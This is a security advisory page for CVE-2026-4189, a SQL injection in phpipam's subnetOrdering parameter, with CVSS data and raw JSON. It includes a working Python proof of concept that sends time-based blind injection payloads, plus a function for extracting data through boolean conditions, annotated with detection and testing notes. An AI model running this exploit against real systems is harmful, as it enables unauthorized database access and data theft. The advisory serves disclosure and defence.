Security Vulnerability Report
CVE-2026-4189 CVSS 4.7 MEDIUM

CVE-2026-4189

Published: 2026-03-16 14:20:02
Last Modified: 2026-04-29 01:00:02

Description

A weakness has been identified in phpipam up to 1.7.4. The impacted element is an unknown function of the file app/admin/sections/edit-result.php of the component Section Handler. Executing a manipulation of the argument subnetOrdering can lead to SQL injection. The attack may be launched remotely; per the CVSS vector below (PR:H), it requires an already authenticated, high-privilege session. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

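phpipam <= 1.7.4 (the description reads "up to 1.7.4", so 1.7.4 itself is affected; no fixed release is named on this page)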

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
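# CVE-2026-4189 SQL Injection PoC for phpipam
# Target: phpipam <= 1.7.4
# File: app/admin/sections/edit-result.php
# Parameter: subnetOrdering
#
# Reviewer notes:
# - The advisory's CVSS vector is PR:H, so the cookie passed in must belong
#   to a high-privilege session; without one the request presumably never
#   reaches the vulnerable code path and the result says nothing.
# - The check is timing-only and takes no baseline. A slow or overloaded
#   server can therefore look "vulnerable"; confirm any positive by
#   repeating it and comparing against a normal request's latency.
# - Detection: the request is a POST to the path above whose subnetOrdering
#   field contains quote characters and SLEEP( - presumably never present
#   in a legitimate ordering value, so it is a usable web/WAF log signature.
# - The advisory names no fixed release and reports no vendor response, so
#   a negative result does not mean "patched".
# - The session cookie is taken from argv and so ends up in shell history
#   and the process list; invalidate that session after testing.
import requests
import sys

# Path of the vulnerable handler, relative to the phpipam base URL.
_ENDPOINT_PATH = "/app/admin/sections/edit-result.php"

# Client-side limit for each request, in seconds.
_REQUEST_TIMEOUT = 10


def _build_headers(cookie):
    """Return the request headers shared by both probes."""
    return {
        'Cookie': cookie,
        'Content-Type': 'application/x-www-form-urlencoded'
    }


def exploit_sql_injection(target_url, cookie):
    """
    SQL Injection PoC for CVE-2026-4189
    This PoC demonstrates time-based blind SQL injection

    Sends one POST whose subnetOrdering value asks the database to sleep
    for 5 seconds and reports the target as vulnerable when the response
    took at least that long.

    Args:
        target_url: Base URL of the phpipam instance.
        cookie: Value for the Cookie header (an authenticated session).

    Returns:
        True if the response was delayed by 5 seconds or more, else False.
        A client-side timeout or any other request error returns False:
        neither is evidence of injection.
    """
    # Target endpoint
    endpoint = f"{target_url}{_ENDPOINT_PATH}"

    # Time-based probe: SLEEP() only runs if the value reaches the SQL
    # statement unescaped.
    payload = {
        'subnetOrdering': "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE SLEEP(0) END) AND '1'='1"
    }

    try:
        print(f"[*] Sending exploit request to {endpoint}")
        response = requests.post(
            endpoint,
            data=payload,
            headers=_build_headers(cookie),
            timeout=_REQUEST_TIMEOUT,
        )
    except requests.exceptions.Timeout:
        # The original reported this as VULNERABLE. A timeout has many
        # causes (network loss, filtering, an overloaded host), so it is
        # reported as inconclusive instead of as a finding.
        print("[-] Request timed out - result is inconclusive, not a confirmation")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {str(e)}")
        return False

    print(f"[*] Response status: {response.status_code}")

    # If vulnerable, the request will take ~5 seconds
    if response.elapsed.total_seconds() >= 5:
        print("[+] Target is VULNERABLE to CVE-2026-4189")
        return True

    print("[-] Target may not be vulnerable or already patched")
    return False


def extract_data(target_url, cookie, query):
    """
    Extract data using SQL injection
    Example: Extract database version

    Evaluates one boolean SQL condition through the same timing channel:
    the database sleeps 3 seconds when the condition holds.

    Args:
        target_url: Base URL of the phpipam instance.
        cookie: Value for the Cookie header (an authenticated session).
        query: SQL boolean expression placed inside the CASE WHEN.

    Returns:
        True if the response took 3 seconds or more, else False. Request
        errors, including timeouts, also return False, so a False result
        does not distinguish "condition false" from "request failed".
    """
    endpoint = f"{target_url}{_ENDPOINT_PATH}"

    # Build extraction payload
    payload = {
        'subnetOrdering': f"1' AND (SELECT CASE WHEN {query} THEN SLEEP(3) ELSE SLEEP(0) END) AND '1'='1"
    }

    try:
        response = requests.post(
            endpoint,
            data=payload,
            headers=_build_headers(cookie),
            timeout=_REQUEST_TIMEOUT,
        )
    except requests.exceptions.RequestException:
        # Narrowed from a bare except, which also swallowed
        # KeyboardInterrupt and programming errors.
        return False

    return response.elapsed.total_seconds() >= 3


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2026-4189.py <target_url> <cookie>")
        print("Example: python cve-2026-4189.py http://target.com 'phpipam=xxx'")
        sys.exit(1)

    target = sys.argv[1]
    cookie = sys.argv[2]

    print("="*60)
    print("CVE-2026-4189 SQL Injection PoC")
    print("Target: phpipam <= 1.7.4")
    print("="*60)

    exploit_sql_injection(target, cookie)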

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4189", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:01.943", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in phpipam up to 1.7.4. The impacted element is an unknown function of the file app/admin/sections/edit-result.php of the component Section Handler. Executing a manipulation of the argument subnetOrdering can lead to sql injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha identificado una debilidad en phpipam hasta la versión 1.7.4. El elemento afectado es una función desconocida del archivo app/admin/sections/edit-result.php del componente Gestor de Secciones. La ejecución de una manipulación del argumento subnetOrdering puede conducir a una inyección SQL. El ataque puede ser lanzado de forma remota. El exploit ha sido puesto a disposición del público y podría ser utilizado para ataques. 
El proveedor fue contactado con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": 
"UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://drive.google.com/file/d/1yxx2iUTG1ebMKo3W9bHlCFFxUJAhkwEk/view?usp=drive_link", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351095", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351095", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769933", "source": "[email protected]"}]}}